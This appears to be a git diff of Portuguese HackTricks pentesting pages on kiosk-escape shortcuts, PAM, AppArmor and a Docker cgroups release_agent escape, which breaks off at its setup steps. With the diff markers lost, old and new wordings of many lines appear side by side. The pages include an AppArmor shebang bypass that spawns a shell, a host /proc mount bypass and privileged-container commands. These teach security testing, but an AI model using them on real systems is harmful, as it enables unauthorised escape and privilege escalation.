* **URIs de Shell**: _shell:Ferramentas Administrativas, shell:Bibliotecas de Documentos, shell:Bibliotecas, shell:Perfis de Usuários, shell:Pessoal, shell:Pasta de Pesquisa, shell:Sistema, shell:Locais de Rede, shell:Enviar para, shell:Perfis de Usuários, shell:Ferramentas Administrativas Comuns, shell:Meu Computador, shell:Internet_
* **Caminhos UNC**: Caminhos para se conectar a pastas compartilhadas. Você deve tentar se conectar ao C$ da máquina local ("\\\127.0.0.1\c$\Windows\System32")
* **Mais caminhos UNC:**
@ -92,15 +105,16 @@ Editor de Registro: [https://sourceforge.net/projects/uberregedit/](https://sour
* Teclas do Mouse SHIFT+ALT+NUMLOCK
* Alto Contraste SHIFT+ALT+PRINTSCN
* Teclas de Alternância Mantenha NUMLOCK pressionado por 5 segundos
* Teclas de Filtro Mantenha o SHIFT direito pressionado por 12 segundos
* WINDOWS+F1 Pesquisa do Windows
* WINDOWS+D Mostrar Área de Trabalho
* WINDOWS+E Abrir o Explorador de Arquivos do Windows
* WINDOWS+E Abrir o Explorador do Windows
* WINDOWS+R Executar
* WINDOWS+U Centro de Facilidade de Acesso
* WINDOWS+F Pesquisar
* SHIFT+F10 Menu de Contexto
* CTRL+SHIFT+ESC Gerenciador de Tarefas
* CTRL+ALT+DEL Tela de boas-vindas nas versões mais recentes do Windows
* CTRL+ALT+DEL Tela de Splash em versões mais recentes do Windows
* F1 Ajuda F3 Pesquisa
* F6 Barra de Endereço
* F11 Alternar tela cheia no Internet Explorer
@ -109,40 +123,39 @@ Editor de Registro: [https://sourceforge.net/projects/uberregedit/](https://sour
* CTRL+N Internet Explorer Nova Página
* CTRL+O Abrir Arquivo
* CTRL+S Salvar CTRL+N Nova RDP / Citrix
## Swipes
## Deslizes
* Deslize da lateral esquerda para a direita para ver todas as janelas abertas, minimizando o aplicativo KIOSK e acessando todo o sistema operacional diretamente;
* Deslize da esquerda para a direita para ver todas as janelas abertas, minimizando o aplicativo KIOSK e acessando todo o sistema operacional diretamente;
* Deslize da direita para a esquerda para abrir o Centro de Ação, minimizando o aplicativo KIOSK e acessando todo o sistema operacional diretamente;
* Deslize de cima para baixo na borda superior para tornar a barra de título visível para um aplicativo aberto em modo de tela cheia;
* Deslize de cima para baixo para tornar a barra de título visível para um aplicativo aberto em modo de tela cheia;
* Deslize de baixo para cima para mostrar a barra de tarefas em um aplicativo em tela cheia.
## Truques do Internet Explorer
### 'Barra de Imagens'
### 'Barra de Ferramentas de Imagem'
É uma barra de ferramentas que aparece no canto superior esquerdo da imagem quando ela é clicada. Você poderá Salvar, Imprimir, Enviar por e-mail, Abrir "Minhas Imagens" no Explorer. O Kiosk precisa estar usando o Internet Explorer.
É uma barra de ferramentas que aparece no canto superior esquerdo da imagem quando clicada. Você poderá Salvar, Imprimir, Enviar por e-mail, Abrir "Minhas Imagens" no Explorer. O Kiosk precisa estar usando o Internet Explorer.
### Protocolo Shell
Digite esses URLs para obter uma visualização do Explorer:
* `shell:Ferramentas Administrativas`
* `shell:Bibliotecas de Documentos`
* `shell:BibliotecaDocumentos`
* `shell:Bibliotecas`
* `shell:Perfis de Usuário`
* `shell:PerfisUsuários`
* `shell:Pessoal`
* `shell:Pasta de Início de Pesquisa`
* `shell:Pasta de Locais de Rede`
* `shell:Enviar para`
* `shell:Perfis de Usuário`
* `shell:Ferramentas Administrativas Comuns`
* `shell:Pasta Meu Computador`
* `shell:Pasta Internet`
* `shell:PastaInícioPesquisa`
* `shell:PastaLocaisRede`
* `shell:EnviarPara`
* `shell:PerfisUsuários`
* `shell:FerramentasAdministrativasComuns`
* `shell:MeuComputador`
* `shell:PastaInternet`
* `Shell:Perfil`
* `Shell:Arquivos de Programas`
* `Shell:ArquivosProgramas`
* `Shell:Sistema`
* `Shell:Painel de Controle`
* `Shell:PainelControle`
* `Shell:Windows`
* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> Painel de Controle
* `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> Meu Computador
@ -153,7 +166,7 @@ Digite esses URLs para obter uma visualização do Explorer:
Verifique esta página para mais informações: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
# Truques dos Navegadores
# Truques de Navegadores
Backup de versões iKat:
@ -167,31 +180,31 @@ Fonte: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811d
## Gestos e botões
* Deslize para cima com quatro (ou cinco) dedos / Toque duas vezes no botão Início: Para visualizar a visualização de multitarefa e alterar o Aplicativo
* Deslize para cima com quatro (ou cinco) dedos / Toque duplo no botão Início: Para visualizar a visualização de multitarefa e alterar o aplicativo
* Deslize de um lado para o outro com quatro ou cinco dedos: Para mudar para o próximo/último Aplicativo
* Deslize de um lado para o outro com quatro ou cinco dedos: Para mudar para o próximo/último aplicativo
* Belisque a tela com cinco dedos / Toque no botão Início / Deslize para cima com 1 dedo da parte inferior da tela em um movimento rápido para cima: Para acessar a Página Inicial
* Deslize um dedo da parte inferior da tela apenas 1-2 polegadas (devagar): O dock aparecerá
* Deslize para baixo a partir do topo do display com 1 dedo: Para visualizar suas notificações
* Deslize para baixo a partir do topo da tela com 1 dedo: Para ver suas notificações
* Deslize para baixo com 1 dedo no canto superior direito da tela: Para ver o centro de controle do iPad Pro
* Deslize 1 dedo da esquerda da tela 1-2 polegadas: Para ver a visualização de Hoje
* Deslize rapidamente 1 dedo do centro da tela para a direita ou esquerda: Para mudar para o próximo/último Aplicativo
* Deslize rapidamente 1 dedo do centro da tela para a direita ou esquerda: Para mudar para o próximo/último aplicativo
* Pressione e segure o botão Liga/Desliga no canto superior direito do **iPad +** Mova o controle deslizante Desligar todo o caminho para a direita: Para desligar
* Pressione e segure o botão Liga/Desliga no canto superior direito do iPad + Mova o controle deslizante Deslizar para desligar todo o caminho para a direita: Para desligar
* Pressione o botão Liga/Desliga no canto superior direito do **iPad e o botão Início por alguns segundos**: Para forçar um desligamento completo
* Pressione o botão Liga/Desliga no canto superior direito do iPad e o botão Início por alguns segundos: Para forçar um desligamento completo
* Pressione o botão Liga/Desliga no canto superior direito do **iPad e o botão Início rapidamente**: Para tirar uma captura de tela que aparecerá no canto inferior esquerdo do display. Pressione ambos os botões ao mesmo tempo brevemente como se os segurasse por alguns segundos um desligamento completo será realizado.
* Pressione o botão Liga/Desliga no canto superior direito do iPad e o botão Início rapidamente: Para tirar uma captura de tela que aparecerá no canto inferior esquerdo da tela. Pressione ambos os botões ao mesmo tempo brevemente, pois se você os segurar por alguns segundos, um desligamento completo será realizado.
## Atalhos
Você deve ter um teclado de iPad ou um adaptador de teclado USB. Apenas os atalhos que poderiam ajudar a escapar do aplicativo serão mostrados aqui.
Você deve ter um teclado para iPad ou um adaptador de teclado USB. Apenas os atalhos que podem ajudar a escapar do aplicativo serão mostrados aqui.
| Tecla | Nome |
| --- | ------------ |
@ -216,7 +229,7 @@ Esses atalhos são para as configurações visuais e de som, dependendo do uso d
| F2 | Aumentar Brilho da Tela |
| F7 | Voltar uma música |
| F8 | Reproduzir/Pausar |
| F9 | Avançar uma música |
| F9 | Avançar música |
| F10 | Silenciar |
| F11 | Diminuir volume |
| F12 | Aumentar volume |
@ -228,12 +241,12 @@ Esses atalhos são para as configurações visuais e de som, dependendo do uso d
| -------------------------------------------------- | ------------------------------------------------------- |
| ⌘H | Ir para a Página Inicial |
| ⌘⇧H (Command-Shift-H) | Ir para a Página Inicial |
| ⌘ (Espaço) | Abrir Spotlight |
| ⌘ (Espaço) | Abrir o Spotlight |
| ⌘⇥ (Command-Tab) | Listar os últimos dez aplicativos usados |
| ⌘\~ | Ir para o último Aplicativo |
| ⌘⇧3 (Command-Shift-3) | Captura de tela (paira no canto inferior esquerdo para salvar ou agir sobre ela) |
| ⌘⇧4 | Captura de tela e abra-a no editor |
| Pressione e segure ⌘ | Lista de atalhos disponíveis para o Aplicativo |
| ⌘\~ | Ir para o último aplicativo |
| ⌘⇧3 (Command-Shift-3) | Captura de tela (aparece no canto inferior esquerdo para salvar ou agir sobre ela) |
| ⌘⇧4 | Captura de tela e abertura no editor |
| Pressionar e segurar ⌘ | Lista de atalhos disponíveis para o aplicativo |
| ⌘⌥D (Command-Option/Alt-D) | Mostra o dock |
| ^⌥H (Control-Option-H) | Botão Início |
| ^⌥H H (Control-Option-H-H) | Mostra a barra de multitarefa |
@ -249,16 +262,64 @@ Esses atalhos são para as configurações visuais e de som, dependendo do uso d
| ⌘⇧⇥ (Command-Shift-Tab) | Alternar para o aplicativo anterior |
| ⌘⇥ (Command-Tab) | Alternar de volta para o aplicativo original |
| ←+→, depois Opção + ← ou Opção+→ | Navegar pelo Dock |
### Atalhos do Safari
| Atalho | Ação |
| ----------------------- | ------------------------------------------------ |
| ⌘L (Command-L) | Abrir Localização |
| ⌘T | Abrir uma nova guia |
| ⌘W | Fechar a guia atual |
| ⌘R | Atualizar a guia atual |
| ⌘. | Parar de carregar a guia atual |
| ^⇥ | Alternar para a próxima guia |
| ^⇧⇥ (Control-Shift-Tab) | Mover para a guia anterior |
| ⌘L | Selecionar o campo de
| Atalho | Ação |
| ----------------------- | ---------------------------------------------- |
| ⌘L (Command-L) | Abrir Localização |
| ⌘T | Abrir uma nova aba |
| ⌘W | Fechar a aba atual |
| ⌘R | Atualizar a aba atual |
| ⌘. | Parar o carregamento da aba atual |
| ^⇥ | Alternar para a próxima aba |
| ^⇧⇥ (Control-Shift-Tab) | Mover para a aba anterior |
| ⌘L | Selecionar o campo de texto/URL para modificá-lo |
| ⌘⇧T (Command-Shift-T) | Abrir a última aba fechada (pode ser usado várias vezes) |
| ⌘\[ | Voltar uma página no histórico de navegação |
| ⌘] | Avançar uma página no histórico de navegação |
| ⌘⇧R | Ativar o Modo Leitor |
### Atalhos do Mail
| Atalho | Ação |
| ------------------------ | -------------------------- |
| ⌘L | Abrir Localização |
| ⌘T | Abrir uma nova aba |
| ⌘W | Fechar a aba atual |
| ⌘R | Atualizar a aba atual |
| ⌘. | Parar o carregamento da aba atual |
| ⌘⌥F (Command-Option/Alt-F) | Pesquisar na sua caixa de correio |
# Referências
* [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
* [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
* [https://thesweetsetup.com/best-ipad-keyboard-shortcuts/](https://thesweetsetup.com/best-ipad-keyboard-shortcuts/)
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O objetivo principal do WhiteIntel é combater invasões de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode acessar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou nos siga no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

49
linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
View file

@ -4,7 +4,7 @@
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
@ -12,17 +12,30 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo deles de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}
---
## Informações Básicas
**PAM (Módulos de Autenticação Plugáveis)** atua como um mecanismo de segurança que **verifica a identidade dos usuários que tentam acessar os serviços de computador**, controlando seu acesso com base em vários critérios. É semelhante a um porteiro digital, garantindo que apenas usuários autorizados possam interagir com serviços específicos, potencialmente limitando seu uso para evitar sobrecargas no sistema.
**PAM (Módulos de Autenticação Pluggable)** atua como um mecanismo de segurança que **verifica a identidade de usuários que tentam acessar serviços de computador**, controlando o acesso deles com base em vários critérios. É como um porteiro digital, garantindo que apenas usuários autorizados possam interagir com serviços específicos, potencialmente limitando o uso deles para evitar sobrecargas no sistema.
### Arquivos de Configuração
- **Sistemas Solaris e baseados em UNIX** geralmente utilizam um arquivo de configuração central localizado em `/etc/pam.conf`.
- **Sistemas Linux** preferem uma abordagem de diretório, armazenando configurações específicas do serviço dentro de `/etc/pam.d`. Por exemplo, o arquivo de configuração para o serviço de login é encontrado em `/etc/pam.d/login`.
- **Sistemas Linux** preferem uma abordagem de diretório, armazenando configurações específicas de serviço dentro de `/etc/pam.d`. Por exemplo, o arquivo de configuração para o serviço de login é encontrado em `/etc/pam.d/login`.
Um exemplo de uma configuração PAM para o serviço de login pode ser assim:
Um exemplo de uma configuração PAM para o serviço de login pode se parecer com isso:
```text
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
@ -59,3 +72,31 @@ Em uma configuração com vários módulos de autenticação, o processo segue u
## Referências
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo de busca de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou nos siga no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

60
linux-hardening/privilege-escalation/docker-security/apparmor.md
View file

@ -6,22 +6,36 @@
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Informações Básicas
AppArmor é um **aperfeiçoamento do kernel projetado para restringir os recursos disponíveis para programas por meio de perfis por programa**, implementando efetivamente o Controle de Acesso Obrigatório (MAC) vinculando atributos de controle de acesso diretamente aos programas em vez de aos usuários. Esse sistema opera **carregando perfis no kernel**, geralmente durante a inicialização, e esses perfis ditam quais recursos um programa pode acessar, como conexões de rede, acesso a soquetes brutos e permissões de arquivo.
AppArmor é um **aperfeiçoamento do kernel projetado para restringir os recursos disponíveis para programas por meio de perfis por programa**, implementando efetivamente o Controle de Acesso Obrigatório (MAC) vinculando atributos de controle de acesso diretamente aos programas em vez de aos usuários. Este sistema opera **carregando perfis no kernel**, geralmente durante a inicialização, e esses perfis ditam quais recursos um programa pode acessar, como conexões de rede, acesso a soquetes brutos e permissões de arquivo.
Existem dois modos operacionais para perfis do AppArmor:
- **Modo de Execução**: Este modo aplica ativamente as políticas definidas dentro do perfil, bloqueando ações que violam essas políticas e registrando quaisquer tentativas de violá-las por meio de sistemas como syslog ou auditd.
- **Modo de Reclamação**: Ao contrário do modo de execução, o modo de reclamação não bloqueia ações que vão contra as políticas do perfil. Em vez disso, registra essas tentativas como violações de política sem impor restrições.
- **Modo de Reclamação**: Ao contrário do modo de execução, o modo de reclamação não bloqueia ações que vão contra as políticas do perfil. Em vez disso, ele registra essas tentativas como violações de política sem impor restrições.
### Componentes do AppArmor
@ -33,7 +47,7 @@ Existem dois modos operacionais para perfis do AppArmor:
### Caminho dos Perfis
Os perfis do AppArmor geralmente são salvos em _**/etc/apparmor.d/**_\
Com `sudo aa-status` você poderá listar os binários que estão restritos por algum perfil. Se você substituir o caractere "/" por um ponto no caminho de cada binário listado, obterá o nome do perfil do apparmor dentro da pasta mencionada.
Com `sudo aa-status` você poderá listar os binários que estão restritos por algum perfil. Se você substituir a barra "/" por um ponto do caminho de cada binário listado, obterá o nome do perfil do apparmor dentro da pasta mencionada.
Por exemplo, um perfil **apparmor** para _/usr/bin/man_ estará localizado em _/etc/apparmor.d/usr.bin.man_
@ -77,7 +91,7 @@ Em seguida, em um console diferente, execute todas as ações que o binário cos
Em seguida, na primeira console pressione "**s**" e depois nas ações gravadas indique se deseja ignorar, permitir ou o que for. Quando terminar, pressione "**f**" e o novo perfil será criado em _/etc/apparmor.d/path.to.binary_
{% hint style="info" %}
Usando as teclas de seta, você pode selecionar o que deseja permitir/negar/ou o que for
Usando as teclas de seta, você pode selecionar o que deseja permitir/negar/o que for
{% endhint %}
### aa-easyprof
@ -135,7 +149,7 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
```
## Registos
Exemplo de registos de **AUDIT** e **DENIED** do ficheiro _/var/log/audit/audit.log_ do executável **`service_bin`**:
Exemplo de registos **AUDIT** e **DENIED** do ficheiro _/var/log/audit/audit.log_ do executável **`service_bin`**:
```bash
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
@ -182,9 +196,9 @@ Por padrão, o perfil **Apparmor docker-default** é gerado a partir de [https:/
- **Acesso** a toda a **rede**
- **Nenhuma capacidade** é definida (No entanto, algumas capacidades virão da inclusão de regras básicas de base, ou seja, #include \<abstractions/base>)
- **Escrita** em qualquer arquivo **/proc** não é permitida
- **Escrita** em qualquer arquivo **/proc** **não é permitida**
- Outros **subdiretórios**/**arquivos** de /**proc** e /**sys** têm acesso de leitura/escrita/bloqueio/link/execução **negado**
- **Montagem** não é permitida
- **Montagem** **não é permitida**
- **Ptrace** só pode ser executado em um processo que está confinado pelo **mesmo perfil apparmor**
Uma vez que você **executa um contêiner docker**, você deve ver a seguinte saída:
@ -192,7 +206,7 @@ Uma vez que você **executa um contêiner docker**, você deve ver a seguinte sa
1 processes are in enforce mode.
docker-default (825)
```
Note que o **apparmor até mesmo bloqueará as permissões de capacidades** concedidas ao contêiner por padrão. Por exemplo, ele será capaz de **bloquear a permissão de escrita dentro de /proc mesmo se a capacidade SYS\_ADMIN for concedida** porque, por padrão, o perfil apparmor do docker nega esse acesso:
Note que o **apparmor até mesmo bloqueará as permissões de capacidades** concedidas ao contêiner por padrão. Por exemplo, ele será capaz de **bloquear a permissão de escrita dentro de /proc mesmo que a capacidade SYS\_ADMIN seja concedida** porque, por padrão, o perfil apparmor do docker nega esse acesso:
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
echo "" > /proc/stat
@ -206,12 +220,12 @@ Observe que por padrão o **AppArmor** também **proibirá o contêiner de monta
Observe que você pode **adicionar/remover** **capacidades** ao contêiner docker (isso ainda será restrito por métodos de proteção como **AppArmor** e **Seccomp**):
- `--cap-add=SYS_ADMIN` concede a capacidade `SYS_ADMIN`
- `--cap-add=ALL` concede todas as capacidades
- `--cap-drop=ALL --cap-add=SYS_PTRACE` remove todas as capacidades e concede apenas `SYS_PTRACE`
* `--cap-add=SYS_ADMIN` concede a capacidade `SYS_ADMIN`
* `--cap-add=ALL` concede todas as capacidades
* `--cap-drop=ALL --cap-add=SYS_PTRACE` remove todas as capacidades e concede apenas `SYS_PTRACE`
{% hint style="info" %}
Normalmente, quando você **descobre** que tem uma **capacidade privilegiada** disponível **dentro** de um **contêiner docker**, mas alguma parte do **exploit não está funcionando**, isso ocorre porque o **apparmor do docker está impedindo**.
Normalmente, quando você **descobre** que tem uma **capacidade privilegiada** disponível **dentro** de um **contêiner docker**, mas parte do **exploit não está funcionando**, isso ocorre porque o **apparmor do docker estará impedindo**.
{% endhint %}
### Exemplo
@ -254,7 +268,7 @@ No caso estranho em que você pode **modificar o perfil do apparmor do docker e
### Bypass do AppArmor
O **AppArmor é baseado em caminhos**, isso significa que mesmo que ele esteja **protegendo** arquivos dentro de um diretório como **`/proc`**, se você puder **configurar como o contêiner será executado**, você poderia **montar** o diretório proc do host dentro de **`/host/proc`** e ele **não será mais protegido pelo AppArmor**.
O **AppArmor é baseado em caminhos**, isso significa que mesmo que ele possa estar **protegendo** arquivos dentro de um diretório como **`/proc`**, se você puder **configurar como o contêiner será executado**, você poderia **montar** o diretório proc do host dentro de **`/host/proc`** e ele **não será mais protegido pelo AppArmor**.
### Bypass do Shebang do AppArmor
@ -268,6 +282,18 @@ exec "/bin/sh"' > /tmp/test.pl
chmod +x /tmp/test.pl
/tmp/test.pl
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater invasões de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode acessar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -277,7 +303,7 @@ Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

41
linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
View file

@ -1,4 +1,4 @@
# Docker release\_agent cgroups escape
# Docker escape de cgroups do release\_agent
<details>
@ -7,13 +7,26 @@
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O objetivo principal do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
**Para mais detalhes, consulte o [post original do blog](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** Este é apenas um resumo:
@ -40,7 +53,7 @@ mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
```
3. **Configurar o Agente de Liberação:**
